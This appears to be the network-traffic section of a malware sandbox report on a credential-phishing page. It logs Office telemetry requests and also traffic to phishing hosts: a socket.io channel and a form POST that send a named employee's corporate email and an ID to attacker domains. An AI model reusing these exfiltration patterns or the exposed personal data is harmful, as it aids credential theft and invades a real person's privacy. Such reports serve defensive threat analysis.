          Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PB7beRv&sid=JMhweoIWN1gqZtHIAAXf HTTP/1.1Host: sandoom2notnt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Auth_UID: USER09102024U44100921Session_Email: gulamrasul.chepuwala@cevalogistics.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://rieg.riegriegrieg.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rieg.riegriegrieg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PB7bdZX HTTP/1.1Host: sandoom2notnt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PB7beRs&sid=JMhweoIWN1gqZtHIAAXf HTTP/1.1Host: sandoom2notnt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PB7bfLc&sid=JMhweoIWN1gqZtHIAAXf HTTP/1.1Host: sandoom2notnt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Auth_UID: USER09102024U44100921Session_Email: gulamrasul.chepuwala@cevalogistics.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://rieg.riegriegrieg.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rieg.riegriegrieg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PB7beRv&sid=JMhweoIWN1gqZtHIAAXf HTTP/1.1Host: sandoom2notnt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20 HTTP/1.1Host: taxigiarebienhoa.vnConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: taxigiarebienhoa.vnConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: www.google.co.uk
          Source: global trafficDNS traffic detected: DNS query: taxigiarebienhoa.vn
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: rieg.riegriegrieg.com
          Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
          Source: global trafficDNS traffic detected: DNS query: www.w3schools.com
          Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
          Source: global trafficDNS traffic detected: DNS query: sandoom2notnt.com
          Source: unknownHTTP traffic detected: POST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N HTTP/1.1Host: rieg.riegriegrieg.comConnection: keep-aliveContent-Length: 139493Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://rieg.riegriegrieg.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 26 Oct 2024 06:48:48 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 21:53:01 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/html
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sat, 26 Oct 2024 06:48:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedContent-Encoding: gzipData Raw: 31 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5d 52 4d 6f db 30 0c bd 17 e8 7f 60 3d ec 16 c1 76 e6 02 83 ed 18 28 f6 81 9d b6 1d 7a d9 51 b6 e9 48 a8 2c 79 12 ed a4 fb f5 a3 9c ba 6b a6 83 3e 28 f2 f1 f1 91 f5 dd e7 1f 9f 1e 7f fd fc 02 8a 46 d3 dc d4 f1 80 40 cf 06 0f 89 42 7d 54 54 e6 59 f6 3e 89 5f 28 7b 3e 46 24 09 56 8e ec b0 68 3c 4d ce 53 02 9d b3 84 96 0e c9 49 f7 a4 0e 3d 2e ba 43 b1 3e 76 a0 ad 26 2d 8d 08 9d 64 d8 7c 07 41 79 6d 9f 04 39 31 68 3a 58 97 40 ca c0 a4 c9 60 03 45 56 c0 77 47 f0 d5 cd b6 bf bd a9 d3 8b bd 4e 5f f2 b7 ae 7f de 18 76 ce 38 5f c2 bb a2 28 2a 18 a5 3f 6a 5b 66 d5 c0 64 4a b0 ce 8f d2 40 5e 4c e7 74 9f 4d 67 78 f0 4c 62 07 df d0 2c 48 ba 93 cc 43 da 20 02 7a 3d 54 f0 a6 d8 0a 5a d9 3d 1d 7d 24 20 b6 14 c3 30 54 51 85 5e 2f ff e9 23 67 72 9c 5d 5b 71 85 91 34 10 d7 db 00 c2 33 09 69 f4 d1 96 d0 b1 5c e8 2b 58 35 2a 3f 66 cc 70 2b 41 18 1c b8 00 51 5c 8c 93 0b ac 9f b3 a5 6c 83 33 33 61 05 e4 a6 12 3e c4 2c ab eb 3d df 98 1b bc ac 5a e5 5b c6 57 4d 20 8a 22 82 fe 83 65 7e bf c2 1a 6d f1 95 f1 c5 b4 fa 9c 2e a6 d6 99 9e 41 b9 1b ac 7c 1e db bf bf 06 15 91 44 14 b6 fa 07 cd 9c f8 9d 34 57 fd 53 7b 8e 9e 9a 47 85 e0 31 b8 d9 77 f1 f2 7b c6 40 d8 f3 e4 cc a6 e7 66 11 b4 c8 04 38 06 9c 05 52 3a 00 77 66 41 7f 57 a7 13 03 a4 ac 63 b3 ed 71 06 e2 44 ac 33 fb 17 37 88 0b 5d c4 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1b7]RMo0`=v(zQH,yk>(F@B}TTY>_({>F$Vh<MSI=.C>v&-d|Aym91h:X@`EVwGN_v8_(*?j[fdJ@^LtMgxLb,HC z=TZ=}$ 0TQ^/#gr][q43i\+X5*?fp+AQ\l33a>,=Z[WM "e~m.A|D4WS{G1w{@f8R:wfAWcqD37]0
